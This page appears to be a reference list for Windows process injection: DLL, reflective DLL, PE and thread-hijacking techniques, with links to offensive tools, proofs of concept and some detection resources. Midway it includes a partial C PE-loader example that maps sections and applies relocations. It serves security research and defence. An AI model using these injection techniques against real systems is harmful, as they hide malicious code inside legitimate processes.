    - "NtmapViewOfSection is a low level function in ntdll. All what MapViewOfSection does is just some small extra, like security checks, sanitizing, etc. Or it might be a simple wrapper. The point is that there isn't any special case where you should use this or that. They both do the same thing. - Unc3nZureD"
Performing
- Process Injection - Part II - 3xpl01tc0d3r(2019)
- Inject All the Things - Shut up and hack - deniable.org(2017)
- [DLL Injection Part 0: Understanding DLL Usage - Mark Wolters(2015)](https://warroom.rsmus.com/dll-injection-part-0-understanding-dll-usage/)
- DLL Injection Part 1: SetWindowsHookEx - malarkey(2015)
- DLL Injection Part 2: CreateRemoteThread and More - malarkey(2015)
- DLL Injection - pentestlab.blog(2017)
- DLL Injection and Hooking
- Delivering custom payloads with Metasploit using DLL injection - blog.cobaltstrike
- DLL Injection via a Custom .NET Garbage Collector - @spottheplanet
Tools
- DLL-Injection - mwwolters
- dll_inject_test
- dllinjector
    - DLL injection tool that implements various methods
- Bleak
    - A Windows native DLL injection library that supports several methods of injection.
- Lunar
    - A lightweight native DLL mapping library that supports mapping directly from memory
- injectAllTheThings
    - Single Visual Studio project implementing multiple DLL injection techniques (actually 7 different techniques) that work for both 32 and 64 bits. Each technique has its own source code file to make it easy to read and understand.
- MemJect
    - Simple DLL injector loading from memory. Supports PE header and entry point erasure. Written in C99.
- Windows-DLL-Injector
Reflective DLL Injection
101
- Reflection (computer programming) - Wikipedia
- HS-P005_ReflectiveDllInjection.pdf - Stephen Fewer(2008)
    - Whitepaper on reflective DLL injection. Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) loader.
- Reflective DLL Injection - Stephen Fewer(2008)
    - Alternate hosting of paper
- Loading a DLL from memory - Joachim Bauch(2010)
- Explaining Reflective DLL Injection in 2 min - by Miss Smurfette(2020)
Info
- Reflective DLL Injection with PowerShell - clymb3r(2013)
- Upgrade your DLL to Reflective DLL - Ionut Popescu(2015)
- An Improved Reflective DLL Injection Technique - Dan Staples(2015)
- Cross-Architecture Reflective DLL Injection - Dan Staples(2015)
- ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue(2017)
- DLL Injection - Pentestlab.blog(2017)
- Inject Dll From Memory Into A Remote Process (InjectLibraryFromMemory_HYPD - Hypodermic) - Vault7Leaks
- DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis - zerosum0x0(2017)
- Reflective DLL Injection - dtm(2017)
- sRDI – Shellcode Reflective DLL Injection - Nick Landers(2017)
Performing
- Portable Executable (P.E.) Code Injection: Injecting an Entire C Compiled Application - Ciro Sisman Pereira(2008)
- Loading Win32/64 DLLs "manually" without LoadLibrary() - xenotron(2014)
    - How to load DLLs by allocating memory and loading the DLL from file/memory and then relocating/importing.
- Reflective DLL Injection - @spotheplanet
- Exploit Development 5: Reflective DLL Injection - Thomas(2017)
- Reflective DLLs and You - cplsec(2018)
    - "This post is about reflective dynamic link libraries (DLL) and will do a simple walk-through on how to write one. This is a technique developed by Stephen Fewer and will use his code to make the magic happen. I realize this is a topic that has been discussed several times so I'm going to keep this post simple and tight."
- Windows - Process Injection Technique: Reflective DLL Injection - t0rchwo0d(2019)
Detection
- Detecting Reflective Injection - Andrew King(DEFCON 20)
    - This talk will focus on detecting reflective injection with some mildly humorous notes and bypassing said protections until vendors start actually working on this problem. It seems amazing that reflective injection still works. Why is that? Because programmers are lazy. They don't want to write new engines, they want to write definitions for an engine that already exists. So what do we do about it? Release a $5 tool that does what $50 AV has failed epically at for several years now...oh and it took me a week or so...Alternately, you could license it to vendors since their programmers are lazy.
- What is Reflective DLL Injection and how can be detected? - Andrea Fortuna(2017)
- PoCs
Tools
- ReflectiveDLLInjection - Stephen Fewer
    - Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
- MemJect
    - Simple DLL injector loading from memory. Supports PE header and entry point erasure. Written in C99.
- doublepulsar-usermode-injector
    - A utility to use the usermode shellcode from the DOUBLEPULSAR payload to reflectively load an arbitrary DLL into another process, for use in testing detection techniques or other security research.
- RemoteFunctions
    - LoadLibrary, GetModuleHandle and GetProcAddress calls for remote processes
- ReflectiveDLLInjection - apriorit
    - This tool demonstrates various remote DLL injection methods.
- ImprovedReflectiveDLLInjection
    - An improvement of the original reflective DLL injection technique by Stephen Fewer of Harmony Security
- injectAllTheThings
    - Single Visual Studio project implementing multiple DLL injection techniques (actually 7 different techniques) that work for both 32 and 64 bits. Each technique has its own source code file to make it easy to read and understand.
- ReflectCmd
    - A simple reflective DLL example
- Pazuzu
    - Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
- Injectora
    - x86/x64 manual mapping injector using the JUCE library
- MemoryModule
    - MemoryModule is a library that can be used to load a DLL completely from memory - without storing on the disk first.
- Windows Manage Reflective DLL Injection Module - Metasploit
- sRDI - Shellcode Reflective DLL Injection
    - sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.
- ReflectivePELoader - BenjaminSoelberg
- DNS Client API
- Process Doppelganging
- DoubleAgent
- Earlybird Injection
- Extra Window Bytes
- Gargoyle
GhostWriting Injection
101
- A paradox: Writing to another process without openning it nor actually writing to it - txipi(2007)
- Informational
- Performing
- PoCs
- Process Hollowing
- (Un-)Hooking
- Inject-Me
- KernelControlTable - ehhhhhhhhhhh
- KnownDLLs Cache Poisoning
- Mapping Injection
- Multiple Provider Router (MPR) DLL and Shell Notifications
NINA
101
- NINA: x64 Process Injection (NINA: No Injection, No Allocation x64 Process Injection Technique.) - NtRaiseHardError(2020)
- NtCreate
.NET/C#
- .NET Internals and Code Injection
    - This article is the obvious culmination of the previous effort of writing the Rebel.NET application and the first of a two series of articles about the .NET framework internals and the protections available for .NET assemblies. The next article will be about .NET native compiling. As the JIT inner workings haven't been analyzed yet, .NET protections are quite naïf nowadays. This situation will rapidly change as soon as the reverse engineering community focuses its attention on this technology. These two articles are aimed to raise the consciousness about the current state of .NET protections and what is possible to achieve but hasn't been done yet. In particular, the current article about .NET code injection represents, let's say, the present, whereas the next one about .NET native compiling represents the future. What I'm presenting in these two articles is new at the time I'm writing it, but I expect it to become obsolete in less than a year. Of course, this is obvious as I'm moving the first steps out from current .NET protections in the direction of better ones. But this article isn't really about protections: exploring the .NET framework internals can be useful for many purposes. So, talking about protections is just a means to an end.
PE Injection
101
- PE Format - docs.ms
- PE Format notes - corkami
- Portable Executable File Format - Johannes Plachy
- CONSTANT INSECURITY: (PECOFF) Portable Executable File Format - Mario Vuksan, Tomislav Pericin(BHUSA2011)
- Injecting code into executables with C - Michal Strehovsky(2007)
- Portable Executable Injection For Beginners - MalwareTech(2013)
- PE injection explained - Advanced memory code injection technique - Emeric Nasi(2014)
- Some thoughts about PE Injection - Andrea Fortuna(2018)
- Code Injection - Process PE Injection Basics - Emeric Nasi(2019)
- Powershell PE Injection: This is not the Calc you are looking for! - b33f
- Info
-
Performing
- PE Section Header Injection using Code Cave
- Reflective PE Injection in Windows 10 1909 - HUBBL3
- [RedDev Series #1] PE Injection Trick - Chiam Yj(2020)
-
Detection
- See the Logging, System Monitoring and Threat Hunting Page.
-
PoCs
- PE-Inject - DelphiBasics(2010)
- PE-inject - Michal Strehovsky
-
ReflectivePELoader
- POC Reflective PE loader for DLL injection.
-
SimplePELoader
- A very simple PE loader for loading DLLs into memory without using LoadLibrary
-
Mandark
- Tiny 64-bit RunPE written in C#
-
Loader
- C# Loader with BlackBone
-
RunPE
- Code that allows running another Windows PE in the same address space as the host process.
-
loadlibrayy
- x64 PE injector with kernel handle elevation and thread hijacking capabilities
- Invoke-ReflectivePEInjection.ps1 - PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
- Invoke-ReflectivePEInjection.ps1 - Empire: https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1
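The loaders listed above (SimplePELoader, ReflectivePELoader, RunPE, the Invoke-ReflectivePEInjection scripts) all do the same platform-independent work before anything touches the target process: parse the PE headers, copy each section to its RVA in a SizeOfImage-sized buffer, and walk the base relocation directory to fix absolute addresses for the new load address. The C below is an added example written for this page, not code from any of those projects. It builds a constructed PE32+ sample in memory so it runs anywhere, and deliberately leaves out import resolution and the Windows-specific allocation and thread-creation calls. The field offsets are the documented IMAGE_NT_HEADERS64, IMAGE_SECTION_HEADER and IMAGE_BASE_RELOCATION layouts; the sample values (ImageBase 0x140000000, a pointer at RVA 0x1008) are assumptions chosen for the demonstration.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* PE fields are unaligned little-endian: access them byte-wise rather than by casting. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static uint64_t rd64(const uint8_t *p) { return rd32(p) | ((uint64_t)rd32(p + 4) << 32); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }
static void wr64(uint8_t *p, uint64_t v) { wr32(p, (uint32_t)v); wr32(p + 4, (uint32_t)(v >> 32)); }

#define SAMPLE_IMAGE_BASE 0x140000000ULL  /* assumed value for the constructed sample */
#define SAMPLE_PTR_RVA    0x1008          /* RVA of an absolute pointer stored in .text */
#define SAMPLE_TARGET_RVA 0x1080          /* RVA that pointer refers to */
#define REL_ABSOLUTE 0                    /* IMAGE_REL_BASED_ABSOLUTE: padding entry, skip */
#define REL_HIGHLOW  3                    /* IMAGE_REL_BASED_HIGHLOW: 32-bit address */
#define REL_DIR64    10                   /* IMAGE_REL_BASED_DIR64: 64-bit address */
#define OPT_BASERELOC (112 + 5 * 8)       /* OptionalHeader.DataDirectory[BASERELOC] */

/* Constructed sample (not a real binary): a PE32+ whose .text holds one absolute pointer
 * and whose .reloc holds one DIR64 entry plus an ABSOLUTE padding entry. */
size_t build_sample_pe(uint8_t *f, size_t cap) {
    const size_t len = 0x600;
    if (cap < len) return 0;
    memset(f, 0, len);
    memcpy(f, "MZ", 2); wr32(f + 0x3c, 0x40);                  /* e_lfanew */
    uint8_t *nt = f + 0x40, *opt = nt + 24, *sec = opt + 240;
    memcpy(nt, "PE\0\0", 4);
    wr16(nt + 4, 0x8664); wr16(nt + 6, 2); wr16(nt + 20, 240); /* Machine, NumberOfSections, SizeOfOptionalHeader */
    wr16(opt, 0x20b);                                           /* Magic = PE32+ */
    wr64(opt + 24, SAMPLE_IMAGE_BASE);                          /* ImageBase */
    wr32(opt + 32, 0x1000); wr32(opt + 36, 0x200);              /* SectionAlignment, FileAlignment */
    wr32(opt + 56, 0x3000); wr32(opt + 60, 0x200);              /* SizeOfImage, SizeOfHeaders */
    wr32(opt + 108, 16);                                        /* NumberOfRvaAndSizes */
    wr32(opt + OPT_BASERELOC, 0x2000); wr32(opt + OPT_BASERELOC + 4, 12);
    /* IMAGE_SECTION_HEADER: Name@0 VirtualSize@8 VirtualAddress@12 SizeOfRawData@16 PointerToRawData@20 */
    memcpy(sec, ".text", 5);
    wr32(sec + 8, 0x100); wr32(sec + 12, 0x1000); wr32(sec + 16, 0x200); wr32(sec + 20, 0x200);
    memcpy(sec + 40, ".reloc", 6);
    wr32(sec + 48, 12); wr32(sec + 52, 0x2000); wr32(sec + 56, 0x200); wr32(sec + 60, 0x400);
    wr64(f + 0x200 + (SAMPLE_PTR_RVA - 0x1000), SAMPLE_IMAGE_BASE + SAMPLE_TARGET_RVA);
    wr32(f + 0x400, 0x1000); wr32(f + 0x404, 12);               /* IMAGE_BASE_RELOCATION: page RVA, SizeOfBlock */
    wr16(f + 0x408, (REL_DIR64 << 12) | (SAMPLE_PTR_RVA - 0x1000));
    wr16(f + 0x40a, REL_ABSOLUTE);
    return len;
}

/* Map a PE32+ file at new_base: copy headers and sections to their RVAs, then patch every
 * base relocation by delta = new_base - ImageBase. Returns a malloc'd image (caller frees)
 * or NULL for malformed input. Import resolution and the target-process allocation and
 * thread calls a real injector wraps around this are left out on purpose. */
uint8_t *pe_map_image(const uint8_t *file, size_t file_len, uint64_t new_base, size_t *image_len) {
    if (file_len < 0x40 || memcmp(file, "MZ", 2) != 0) return NULL;
    uint32_t e_lfanew = rd32(file + 0x3c);
    if (e_lfanew > file_len || file_len - e_lfanew < 24 + 240) return NULL;
    const uint8_t *nt = file + e_lfanew, *opt = nt + 24, *sec = opt + rd16(nt + 20);
    if (memcmp(nt, "PE\0\0", 4) != 0 || rd16(opt) != 0x20b) return NULL;
    uint16_t nsec = rd16(nt + 6);
    uint64_t image_base = rd64(opt + 24), delta = new_base - image_base;
    uint32_t size_of_image = rd32(opt + 56), size_of_headers = rd32(opt + 60);
    uint32_t rel_rva = rd32(opt + OPT_BASERELOC), rel_sz = rd32(opt + OPT_BASERELOC + 4);
    if (size_of_headers > file_len || size_of_headers > size_of_image) return NULL;
    if ((size_t)(sec - file) + (size_t)nsec * 40 > size_of_headers) return NULL;
    if ((uint64_t)rel_rva + rel_sz > size_of_image) return NULL;
    uint8_t *img = calloc(1, size_of_image);
    if (!img) return NULL;
    memcpy(img, file, size_of_headers);
    for (uint16_t i = 0; i < nsec; i++, sec += 40) {
        uint32_t va = rd32(sec + 12), raw_sz = rd32(sec + 16), raw_ptr = rd32(sec + 20);
        if ((uint64_t)raw_ptr + raw_sz > file_len || (uint64_t)va + raw_sz > size_of_image) goto bad;
        memcpy(img + va, file + raw_ptr, raw_sz);
    }
    for (uint32_t off = 0; delta != 0 && off + 8 <= rel_sz; ) {   /* one block per 4 KiB page */
        uint32_t page = rd32(img + rel_rva + off), blk = rd32(img + rel_rva + off + 4);
        if (blk < 8 || off + blk > rel_sz) goto bad;
        for (uint32_t e = 8; e + 2 <= blk; e += 2) {
            uint16_t ent = rd16(img + rel_rva + off + e);
            uint64_t rva = (uint64_t)page + (ent & 0xfff);
            if ((ent >> 12) == REL_ABSOLUTE) continue;
            if ((ent >> 12) == REL_DIR64 && rva + 8 <= size_of_image) wr64(img + rva, rd64(img + rva) + delta);
            else if ((ent >> 12) == REL_HIGHLOW && rva + 4 <= size_of_image) wr32(img + rva, rd32(img + rva) + (uint32_t)delta);
            else goto bad;                                          /* unsupported type or out of range */
        }
        off += blk;
    }
    *image_len = size_of_image;
    return img;
bad:
    free(img);
    return NULL;
}

/* Build the sample, map it at new_base, return the relocated pointer (0 on failure). */
uint64_t sample_relocated_pointer(uint64_t new_base) {
    uint8_t f[0x600]; size_t n = build_sample_pe(f, sizeof f), len = 0;
    uint8_t *img = pe_map_image(f, n, new_base, &len);
    uint64_t v = img ? rd64(img + SAMPLE_PTR_RVA) : 0;
    free(img);
    return v;
}

/* A file cut short of its .reloc raw data must be rejected, not read past the buffer. */
int sample_truncated_is_rejected(void) {
    uint8_t f[0x600]; size_t len = 0;
    build_sample_pe(f, sizeof f);
    return pe_map_image(f, 0x500, 0x7ff600000000ULL, &len) == NULL;
}
```

Mapping at the original ImageBase leaves the pointer untouched (delta is zero, so the relocation walk is skipped); mapping anywhere else rewrites it, and the ABSOLUTE padding entry that rounds a block to a 4-byte boundary is skipped rather than treated as a fixup. A file truncated before its .reloc raw data fails at the section-copy bounds check instead of reading out of bounds, which is the check most toy loaders omit. A full loader adds the import table walk (directory index 1), per-section page protections, TLS callbacks and the entry-point call on top of this.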
-
101
- PowerLoader(Ex)
- Print Spooler
- PROPagate
- Service Control Handler
- Shatter
- Shellcode Injection
-
Stack Bomber
- 101
- Info
- Performing
- Detection
-
PoC
-
Pinjectra
- Pinjectra is a C/C++ OOP-like library that implements Process Injection techniques (with focus on Windows 10 64-bit)
-
Thread Execution Hijacking
- 101
-
Info
- Ten process injection techniques: A technical survey of common and trending process injection techniques - Ashkan Hosseini(2017)
- PE 1nj3ct10n and Thread Hijacking For Malware Analysis - Alparslan Akyıldız academy(2019)
- Dridex’s Bag of Tricks: An Analysis of its Masquerading and Code Injection Techniques - Ratnesh Pandey
- Performing
- Detection
-
PoC
- InjectThread.c
-
ThreadBoat
- Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.
-
cThreadHijack
- Beacon Object File (BOF) for remote process injection via thread hijacking
- ThreadLocal Storage Injection
- Tooltips/Common Controls
- Windows Notification Facility
- WinSock Helper Functions(WSHX)